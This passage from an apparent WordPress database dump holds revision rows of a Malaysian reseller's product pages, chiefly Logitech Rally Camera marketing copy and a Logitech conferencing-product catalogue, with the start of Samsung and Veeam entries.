Camera','','inherit','closed','closed','','2885-revision-v1','','','2019-02-13 16:47:08','2019-02-13 08:47:08','',2885,'https://bintara.com.my/blog/2019/02/13/2885-revision-v1/',0,'revision','',0),(2898,1,'2019-02-14 14:34:21','2019-02-14 06:34:21','<blockquote class=\"wp-embedded-content\" data-secret=\"FHYu4CNrEc\"><a href=\"https://bintara.com.my/get-quotation-logitech/\">Get Quotation (Logitech)</a></blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"https://bintara.com.my/get-quotation-logitech/embed/#?secret=FHYu4CNrEc\" data-secret=\"FHYu4CNrEc\" width=\"222\" height=\"200\" title=\"&#8220;Get Quotation (Logitech)&#8221; &#8212; Bintara Solutions Sdn Bhd (BINTARA)\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>','','','publish','closed','closed','','965ea6c2984e45b328cac10cab17b1e6','','','2019-02-14 14:34:21','2019-02-14 06:34:21','',0,'https://bintara.com.my/blog/2019/02/14/965ea6c2984e45b328cac10cab17b1e6/',0,'oembed_cache','',0),(2893,1,'2019-02-14 14:28:17','2019-02-14 06:28:17','<h3>Rally Camera</h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.</p><ul><li>RightSenseâ„¢ technology automates a better user experience</li><li>Advanced optics frame every participant with amazing clarity</li><li>Sleek industrial design for any professional meeting space</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Peerless Performance. Exceptional Versatility.</h3><p><br />With premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from LogitechÂ®. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan/Tilt/Zoom, razor-sharp 15X HD zoom, expansive 90Â° field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.</p>https://youtu.be/TWRoAslIm0c<h3>STUDIO-QUALITY VIDEO</h3><p>With an Ultra-HD imaging system, Rally Camera delivers brilliantly sharp video, outstanding colour, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLightâ„¢ technology optimises light balance to emphasise faces and render natural-looking skin tones, even in dim or backlit conditions.</p><h3>SLEEK INDUSTRIAL DESIGN</h3><p>Rally Camera incorporates world-class Logitech optics and 4K sensor in a premium industrial design suitable for any professional setting. Elegantly finished in matte black with slate gray metal trim, Rally Camera can be positioned on a table, mounted on a tripod, or secured to a wall with included hardware. For overhead installations, the camera detects when itâ€™s inverted and automatically corrects image orientation and camera controls.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SEE EVERYONE, PERFECTLY FRAMED</h3><p>Logitech RightSightâ„¢ camera control automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.</p><p>Future Availability: RightSight will be enabled by a software download, with initial support for Windows 10.</p>https://youtu.be/-xGIqpPOyXs<h3>ENHANCED USER EXPERIENCE</h3><p>Logitech RightSenseâ„¢ is a suite of proactive technologies built into Rally Camera that automate a better user experience. RightSightâ„¢ automates camera control to perfectly frame participants, no matter their distance from the lens. RightLightâ„¢ optimises light balance and prioritises faces over objects and surfaces to render natural-looking skin tones. Plus, Rally Camera is compatible with virtually any video conferencing app right out of the box.</p>','Logitech Rally Camera','','inherit','closed','closed','','2885-revision-v1','','','2019-02-14 14:28:17','2019-02-14 06:28:17','',2885,'https://bintara.com.my/blog/2019/02/14/2885-revision-v1/',0,'revision','',0),(2892,1,'2019-02-14 14:14:50','2019-02-14 06:14:50','','rally-camera','','inherit','closed','closed','','rally-camera-2','','','2019-02-14 14:14:50','2019-02-14 06:14:50','',2885,'https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg',0,'attachment','image/jpeg',0),(1722,1,'2018-12-11 17:36:45','2018-12-11 09:36:45','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech</h1>\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<h2 style=\"text-align: center;\">CONFERENCE CAMERAS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>\r\n\r\n<table border=\"0px\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1242 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Group</strong>\r\n\r\n[maxbutton id=\"2\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1249 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Rally</strong>\r\n\r\n[maxbutton id=\"2\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1316 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /><strong>Logitech MeetUp</strong>\r\n\r\n[maxbutton id=\"2\"]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1318 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Connect</strong>\r\n\r\n[maxbutton id=\"2\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech BCC950</strong>\r\n\r\n[maxbutton id=\"2\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1321 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech PTZ Pro 2</strong>\r\n\r\n[maxbutton id=\"2\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">VC ROOM SOLUTIONS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>\r\n<img class=\"wp-image-1327 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong><span class=\"product-name\">SMARTDOCK</span></strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"2\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">WEBCAMS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1332 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Brio</strong>\r\n\r\n[maxbutton id=\"2\"]</td>\r\n<td width=\"200\"><img class=\"aligncenter wp-image-1334 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C9230e</strong>\r\n\r\n[maxbutton id=\"2\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1336 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C925e</strong>\r\n\r\n[maxbutton id=\"2\"]</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">Â <img class=\"wp-image-1354 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech B525</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"2\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">HEADSETS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>\r\n<img class=\"wp-image-1364 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"2\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">VIDEO COLLABORATION ACCESSORIES</h2>\r\n&nbsp;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1386\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong><span class=\"product-name\">SmartDock Extender Box</span></strong>\r\n\r\n[maxbutton id=\"2\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1391\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong>Screen Share</strong>\r\n\r\n[maxbutton id=\"2\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1392\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong>Group Expansion Mics</strong>\r\n\r\n[maxbutton id=\"2\"]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1397\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nLogitech SmartDock Flex\r\n\r\n[maxbutton id=\"2\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1401\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nGroup 15m Extended Cable\r\n\r\n[maxbutton id=\"2\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nGroup 10m Extended Cable\r\n\r\n[maxbutton id=\"2\"]</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\"><img class=\"aligncenter wp-image-1406 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\">MeetUp Expansion Mic</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"2\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 17:36:45','2018-12-11 09:36:45','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(1723,1,'2018-12-11 17:38:28','2018-12-11 09:38:28','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech</h1>\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<h2 style=\"text-align: center;\">CONFERENCE CAMERAS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>\r\n\r\n<table border=\"0px\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1242 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Group</strong>\r\n\r\n[maxbutton id=\"3\" ]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1249 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Rally</strong>\r\n\r\n[maxbutton id=\"3\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1316 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /><strong>Logitech MeetUp</strong>\r\n\r\n[maxbutton id=\"3\"]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1318 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Connect</strong>\r\n\r\n[maxbutton id=\"3\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech BCC950</strong>\r\n\r\n[maxbutton id=\"3\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1321 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech PTZ Pro 2</strong>\r\n\r\n[maxbutton id=\"3\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">VC ROOM SOLUTIONS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>\r\n<img class=\"wp-image-1327 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong><span class=\"product-name\">SMARTDOCK</span></strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">WEBCAMS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1332 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Brio</strong>\r\n\r\n[maxbutton id=\"3\"]</td>\r\n<td width=\"200\"><img class=\"aligncenter wp-image-1334 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C9230e</strong>\r\n\r\n[maxbutton id=\"3\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1336 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C925e</strong>\r\n\r\n[maxbutton id=\"3\"]</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">Â <img class=\"wp-image-1354 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech B525</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">HEADSETS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>\r\n<img class=\"wp-image-1364 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">VIDEO COLLABORATION ACCESSORIES</h2>\r\n&nbsp;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1386\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong><span class=\"product-name\">SmartDock Extender Box</span></strong>\r\n\r\n[maxbutton id=\"3\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1391\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong>Screen Share</strong>\r\n\r\n[maxbutton id=\"3\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1392\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong>Group Expansion Mics</strong>\r\n\r\n[maxbutton id=\"3\"]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1397\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nLogitech SmartDock Flex\r\n\r\n[maxbutton id=\"3\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1401\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nGroup 15m Extended Cable\r\n\r\n[maxbutton id=\"3\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nGroup 10m Extended Cable\r\n\r\n[maxbutton id=\"3\"]</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\"><img class=\"aligncenter wp-image-1406 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\">MeetUp Expansion Mic</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 17:38:28','2018-12-11 09:38:28','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(1764,1,'2018-12-12 15:02:08','2018-12-12 07:02:08','Television, Smart Television, Storage, Printers. <a href=\"https://bintara.com.my/samsung/\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1707\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Samsung-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','SAMSUNG','','inherit','closed','closed','','1432-autosave-v1','','','2018-12-12 15:02:08','2018-12-12 07:02:08','',1432,'https://bintara.com.my/blog/2018/12/12/1432-autosave-v1/',0,'revision','',0),(1724,1,'2018-12-11 17:40:28','2018-12-11 09:40:28','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech</h1>\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<h2 style=\"text-align: center;\">CONFERENCE CAMERAS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>\r\n\r\n<table border=\"0px\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1242 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n<p style=\"text-align: center;\"><strong>Logitech Group</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1249 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n<p style=\"text-align: center;\"><strong>Logitech Rally</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-1316 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /><strong>Logitech MeetUp</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1318 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech Connect</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech BCC950</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1321 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech PTZ Pro 2</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">VC ROOM SOLUTIONS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>\r\n<img class=\"wp-image-1327 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong><span class=\"product-name\">SMARTDOCK</span></strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">WEBCAMS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1332 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech Brio</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"aligncenter wp-image-1334 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech C9230e</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1336 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech C925e</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">Â <img class=\"wp-image-1354 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech B525</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">HEADSETS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>\r\n<img class=\"wp-image-1364 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">VIDEO COLLABORATION ACCESSORIES</h2>\r\n&nbsp;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1386\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\"><strong><span class=\"product-name\">SmartDock Extender Box</span></strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1391\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\"><strong>Screen Share</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1392\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\"><strong>Group Expansion Mics</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1397\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\">Logitech SmartDock Flex</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1401\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\">Group 15m Extended Cable</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\">Group 10m Extended Cable</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\"><img class=\"aligncenter wp-image-1406 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\">MeetUp Expansion Mic</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 17:40:28','2018-12-11 09:40:28','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(2137,1,'2018-12-14 10:51:03','2018-12-14 02:51:03','<h3>Veeam</h3>\r\n<h3><span class=\"veeam-text__text-largest\">Expanding leadership inÂ CloudÂ Data Management</span></h3>\r\n<div class=\"section-title-component aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--phone--0 aem-GridColumn--tablet--6 aem-GridColumn--offset--default--0\">\r\n<div class=\"section-title section-title--alignment-left section-title--only-title veeam-component__component-spacing-below--md\">\r\n<div 